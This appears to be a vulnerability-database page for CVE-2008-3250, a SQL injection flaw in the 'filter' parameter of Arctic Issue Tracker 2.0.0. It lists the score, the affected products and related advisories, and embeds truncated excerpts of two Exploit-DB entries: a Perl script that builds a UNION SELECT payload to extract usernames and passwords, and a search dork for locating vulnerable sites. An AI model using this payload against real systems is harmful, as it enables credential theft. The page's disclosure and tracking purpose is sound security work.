CVE-2008-3250
published 2008-07-21CVE-2008-3250: SQL injection vulnerability in index.php in Arctic Issue Tracker 2.0.0 allows remote attackers to execute arbitrary SQL commands via the filter parameter.
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.28%
81.0th percentile
SQL injection vulnerability in index.php in Arctic Issue Tracker 2.0.0 allows remote attackers to execute arbitrary SQL commands via the filter parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| arctictracker | arctic_issue_tracker | — | — |
| boldfx | arctic_issue_tracker | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-356h-69fm-h3qg: SQL injection vulnerability in index
ghsa_unreviewed·2022-05-02·CVSS 7.5
CVE-2009-4350 [HIGH] CWE-89 GHSA-356h-69fm-h3qg: SQL injection vulnerability in index
SQL injection vulnerability in index.php in Arctic Issue Tracker 2.1.1 allows remote attackers to execute arbitrary SQL commands via the (1) matchings[id] or (2) matchings[title] parameters in a Login action to an unspecified program, or (3) the matchings[id] parameter in a search action to index.php, a different vector than CVE-2008-3250. NOTE: some of these details are obtained from third party information.
GHSA
GHSA-vm4h-83vj-vv8g: SQL injection vulnerability in index
ghsa_unreviewed·2022-05-01
CVE-2008-3250 [HIGH] CWE-89 GHSA-vm4h-83vj-vv8g: SQL injection vulnerability in index
SQL injection vulnerability in index.php in Arctic Issue Tracker 2.0.0 allows remote attackers to execute arbitrary SQL commands via the filter parameter.
No detection rules found.
Exploit-DB
Arctic Issue Tracker 2.0.0 - 'filter' SQL Injection (2)
exploitdb·2008-07-21
CVE-2008-3250 Arctic Issue Tracker 2.0.0 - 'filter' SQL Injection (2)
Arctic Issue Tracker 2.0.0 - 'filter' SQL Injection (2)
---
#!/usr/bin/perl
use IO::Socket;
print q{
Arctic Issue Tracker v2.0.0 exploit by ldma
~ SubCode ~
use: arctic.pl [server] [dir]
sample:
$perl arctic.pl localhost /arctic/
};
$webpage = $ARGV[0];
$directory = $ARGV[1];
print "+-initiating\n";
print "|--modules..OK!\n";
sleep 1;
print "|--premodules..OK!\n";
sleep 1;
print "|--preprocessors..OK!\n";
sleep 1;
print "+-opening channel.. OK!\n";
sleep 2;
print "--------------------------------------------\n";
print "~ configuration complete.. OK!\n";
print "~ scanning";
$|=1;
foreach (1..2) {
print ".";
sleep 1;
}
print " OK!\n";
if (!$webpage) { die "\+ rtfm geek\n"; }
$wbb_dir =
"http://".$webpage.$directory."index.php?filter=-1%20union%20select%201,2,3,concat(username,0x3a,pa
Exploit-DB
Arctic Issue Tracker 2.0.0 - 'filter' SQL Injection (1)
exploitdb·2008-07-17
CVE-2008-3250 Arctic Issue Tracker 2.0.0 - 'filter' SQL Injection (1)
Arctic Issue Tracker 2.0.0 - 'filter' SQL Injection (1)
---
IloveYouTryaG
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
| \/_/\ \ /' _ `\ \/\ \/_/_\_> Kings of injection |
| \/___/ |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
Title :: Remote SQL Injection
Author :: QTRinu x [ Qataro (at) hotmail (dot) Com ]
Application :: Arctic Issue Tracker v2.0.0
Download :: http://www.arctictracker.com
Price :: $99.95 USD
Dork 1 :: Powered by Arctic v2.0.0
ShoutZ :: Allah ,InJecTor,AlQaTaRi,all InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers
Terms of use :: This exploit is just for educational purposes, DO NOT use it for il
No writeups or analysis indexed.
http://secunia.com/advisories/31139http://securityreason.com/securityalert/4017http://www.securityfocus.com/bid/30277https://exchange.xforce.ibmcloud.com/vulnerabilities/43872https://www.exploit-db.com/exploits/6097https://www.exploit-db.com/exploits/6113http://secunia.com/advisories/31139http://securityreason.com/securityalert/4017http://www.securityfocus.com/bid/30277https://exchange.xforce.ibmcloud.com/vulnerabilities/43872https://www.exploit-db.com/exploits/6097https://www.exploit-db.com/exploits/6113
2008-07-21
Published